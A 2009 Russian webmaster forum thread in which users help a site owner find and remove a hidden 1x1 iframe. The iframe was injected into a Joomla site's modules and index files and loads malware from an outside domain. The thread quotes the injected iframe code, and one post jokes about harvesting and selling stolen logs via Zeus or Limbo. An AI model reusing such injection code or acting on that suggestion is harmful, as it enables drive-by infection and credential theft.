Имеется информация, что этот сайт атакует компьютеры!

Тема в разделе "Сайт умер, лежит и не дышит", создана пользователем borodyder, 26.01.2009.

  1. borodyder
    Offline

    borodyder Недавно здесь

    Регистрация:
    25.01.2009
    Сообщения:
    119
    Симпатии:
    4
    Пол:
    Мужской
    разрешилась наконец то эта проблема.
    зашел на панель веб-мастера в гугл, зарегистрировал там свой сайт, а потом там просто тупо кнопочку надо было нажать чтоб пересмотрели все проблемы в гугле. понадобились всего сутки. так что если у кого подобная проблема будет, делайте так же. и всем гранд мерси кто откликнулся.
     
  2. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 573
    Симпатии:
    152
    Пол:
    Мужской
    О чем я и писал выше
     
    borodyder нравится это.
  3. borodyder
    Offline

    borodyder Недавно здесь

    Регистрация:
    25.01.2009
    Сообщения:
    119
    Симпатии:
    4
    Пол:
    Мужской
    Опять старая проблема. В основном пользуюсь файрфоксом. Когда с него захожу на свой сайт , никаких проблем не возникает. Но зашел сегодня на всякий случай гугл хромом и эксплорером и он мне опять начал выдавать, что мой сайт заражен и проблемы там какие-то. Я зашел на фтп, скачал оттуда все, что там есть, себе в комп. система у меня установлена совсем недавно, на всякие порносайты не захожу, так что вирусы какие то мне негде подхватить, тем более пользуюсь касперским. все что я скачал с фтп, проверил им. проверка не нашла никакое вредоносное ПО. скриншоты прилагаю. и я никак не связан с владельцами тех страниц, чьи домены упоминаются в предупреждении о троянах и о вредоносном ПО. мой комп проверен касперским полностью вчера, в нем он не нашел ничего такого, чего не должно в нем быть. скриншоты прилагаю.
    скажите пожалуйста, что делать?
     

    Вложения:

  4. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 573
    Симпатии:
    152
    Пол:
    Мужской
    На твоем сайте ссылка на http://worldgems.ru/ (в исходном коде index.php) коде вот с него и лезет зараза
     
  5. borodyder
    Offline

    borodyder Недавно здесь

    Регистрация:
    25.01.2009
    Сообщения:
    119
    Симпатии:
    4
    Пол:
    Мужской
    да, спасибо тебе. действительно если смотреть исходный код страницыы, то там есть эти айфреймы в двух местах. но я посмотрл сам файл индекс.пхп в корне сайта и там нету их. подскажи плиз где их искать
     
  6. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 573
    Симпатии:
    152
    Пол:
    Мужской
    Может быть зашифровано, то что вижу

    <div class="ja-box-ct clearfix">
    <form name="form2" method="post" action="index.php">
    </form>
    <iframe height="1" frameborder="0" width="1" src="http://worldgems.ru/pics/catalogue/0/go.php?sid=5">

    посмотри в ja-box или индех в личку хотя 99% в него подгружается этот фрейм
     
  7. borodyder
    Offline

    borodyder Недавно здесь

    Регистрация:
    25.01.2009
    Сообщения:
    119
    Симпатии:
    4
    Пол:
    Мужской
    на савмом деле там этот айфрейм в двух местах. первый в том месте где модуль голосование как вы о нас узнали а второй фрейм в модуле где поиск. так что мне кажется что туда он подгружается.
     
  8. borodyder
    Offline

    borodyder Недавно здесь

    Регистрация:
    25.01.2009
    Сообщения:
    119
    Симпатии:
    4
    Пол:
    Мужской
    кстати решил посмотреть может там на самом деле где то в этих модулях этот айфрейм прописался. посмтрел в модуле поиска и в натуре его там нашел. потом посмотрел модуль и компонент голосования и тоже там этот айфрейм нашел...
    потом все это дело стер и щас пока не знаю еще че дальше будет
    по крайней мере в хтмл коде страницы уже этих айфреймов нет, но на всякий случай я решил проверить все остальные папки с модулями и прочими делами. и к своему ужасу я там обнаружил что почти в каждом файле с названием типа индекс.хтмл есть этот айфрейм. возможно ли мне это все дело как то устранить. в принципе у меня там нету ничего выдающегося на сайте, чем можно пожертвовать. единственное только датсогалерею жалко. но может какой то способ есть?
     
    Последнее редактирование: 21.03.2009
  9. doctorgrif
    Offline

    doctorgrif специалист

    Регистрация:
    14.01.2008
    Сообщения:
    1 284
    Симпатии:
    66
    Пол:
    Мужской
    mod_poll
     
  10. borodyder
    Offline

    borodyder Недавно здесь

    Регистрация:
    25.01.2009
    Сообщения:
    119
    Симпатии:
    4
    Пол:
    Мужской
    на всякий случай я решил проверить все остальные папки с модулями и прочими делами. и к своему ужасу я там обнаружил что почти в каждом файле с названием типа индекс.хтмл есть этот айфрейм. возможно ли мне это все дело как то устранить. в принципе у меня там нету ничего выдающегося на сайте, чем можно пожертвовать. единственное только датсогалерею жалко. но может какой то способ есть?
     
  11. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 573
    Симпатии:
    152
    Пол:
    Мужской
    В дрим вивере запусти автозамену на вредоносного кода на // Либо замени все индекс хтмл на пустые
    Поменяй пасс на фтп и админку
     
  12. borodyder
    Offline

    borodyder Недавно здесь

    Регистрация:
    25.01.2009
    Сообщения:
    119
    Симпатии:
    4
    Пол:
    Мужской
    нни разу ей не пользолвался на самом деле. то есть все что у меня есть на фтп надо на комп накинуть и в нем уже редактировать?
     
  13. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 573
    Симпатии:
    152
    Пол:
    Мужской
    Там есть такая функция замена по всему сайту Ctrl+ F (указываешь путь к папке), хоть в коде, хоть в тексте. Где делать, это как удобнее
     
    Последнее редактирование: 21.03.2009
  14. borodyder
    Offline

    borodyder Недавно здесь

    Регистрация:
    25.01.2009
    Сообщения:
    119
    Симпатии:
    4
    Пол:
    Мужской
    как это возможно реализовать? хотя бы примерный алгоритм
     
  15. borodyder
    Offline

    borodyder Недавно здесь

    Регистрация:
    25.01.2009
    Сообщения:
    119
    Симпатии:
    4
    Пол:
    Мужской
    не могу почему то никак у себя дримвивер установить. но у меня такой вопрос: у меня сайт же в интернете лежит. я смогу при помощи дримвивера это все отредактировать? просто я щас вручную начал исправлять в резервной копии в компе и там разные иногда айфреймы встречаются. а если такой вариант: просто по очереди все файлы зараженные заменить на которые нормальные из установочного архива а например ту же дастогалерею вручную отремонтировать. будет у меня сайт работать? насколько отличаются файлы в фтп от установочного архива помимо отсутствия в ней папки instalation и прочее. не повредит ли мне замена папаок с зараженными файлами индекс на нормальные?
     
  16. Offline

    luter Недавно здесь

    Регистрация:
    18.03.2009
    Сообщения:
    5
    Симпатии:
    0
    че тут думать то??снимаеш хост по соседству с zeus или limbo,учитываая каталоги которые у тя появились, это именно так:) ну так кайфуй, логи качаем, парсим, и продаем:D
    что именно тя беспокоит?
     
  17. koreeckz
    Offline

    koreeckz специалист

    Регистрация:
    03.03.2009
    Сообщения:
    422
    Симпатии:
    30
    Пол:
    Мужской
    Вот держи пустой index.html просто берешь и вставляешь его в нужное место, конечно мутрно, но это быстрее чем ты разберешься с дримвивером, ну еще пробегись поиском по файлам сайта через тот же тотал коммандер в поисках вредоносного кода. ) Надеюсь решишь свою проблему )
     

    Вложения:

    • index.rar
      Размер файла:
      116 байт
      Просмотров:
      1
  18. borodyder
    Offline

    borodyder Недавно здесь

    Регистрация:
    25.01.2009
    Сообщения:
    119
    Симпатии:
    4
    Пол:
    Мужской
    спасибо чувак
    у меня в принципе выбора нет. именно этим я и занялся...
     
  19. koreeckz
    Offline

    koreeckz специалист

    Регистрация:
    03.03.2009
    Сообщения:
    422
    Симпатии:
    30
    Пол:
    Мужской
    borodyder, не за что :)
     
  20. borodyder
    Offline

    borodyder Недавно здесь

    Регистрация:
    25.01.2009
    Сообщения:
    119
    Симпатии:
    4
    Пол:
    Мужской
    и еще такой вопрос. я почти все файлы с этими айфреймами поменял на нормальные. но сами понимаете, все живые люди, где то че то мог и упустить. при помощи какой проги можно это дело проверить, то есть по какой то конкретной фразе, которая может содержаться в файле индекс.хтмл типа поиска
     

Поделиться этой страницей

Загрузка...